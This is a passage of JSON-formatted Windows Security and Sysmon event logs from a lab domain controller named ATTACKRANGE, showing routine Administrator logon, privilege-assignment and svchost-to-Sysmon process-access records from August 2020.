command.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-6178966$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","LogonGuid":"{00000000-0000-0000-0000-000000000000}","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonGuid":"{B0223783-4A4F-16BB-7F4A-4A44C6266D53}","TargetServerName":"localhost","TargetInfo":"localhost","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","EventReceivedTime":"2020-08-01 07:59:13","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:11","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220593,"ActivityID":"{C6A61085-67D8-0001-8610-A6C6D867D601}","ProcessID":864,"ThreadID":904,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-6178966$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-21-2231640892-1842410504-3836505531-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x7F994\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{B0223783-4A4F-16BB-7F4A-4A44C6266D53}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x520\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\tWIN-DC-6178966\r\n\tSource Network Address:\t-\r\n\tSource Port:\t\t-\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tAdvapi  \r\n\tAuthentication Package:\tNegotiate\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-6178966$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","TargetUserSid":"S-1-5-21-2231640892-1842410504-3836505531-500","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x7f994","LogonType":"3","LogonProcessName":"Advapi  ","AuthenticationPackageName":"Negotiate","WorkstationName":"WIN-DC-6178966","LogonGuid":"{B0223783-4A4F-16BB-7F4A-4A44C6266D53}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 07:59:13","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:11","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220594,"ActivityID":"{C6A61085-67D8-0001-8610-A6C6D867D601}","ProcessID":864,"ThreadID":904,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-2231640892-1842410504-3836505531-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x7F994\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-21-2231640892-1842410504-3836505531-500","SubjectUserName":"Administrator","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x7f994","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","EventReceivedTime":"2020-08-01 07:59:13","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:11","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5070,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:11.862\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:11.862","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:13","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:11","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5071,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:11.862\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:11.862","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:13","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:11","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5072,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:11.862\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:11.862","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:13","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:11","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5073,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:11.862\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:11.862","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:13","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:11","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5074,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:11.862\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:11.862","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:13","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:11","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5075,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:11.862\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:11.862","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:13","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:11","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5076,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:11.862\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 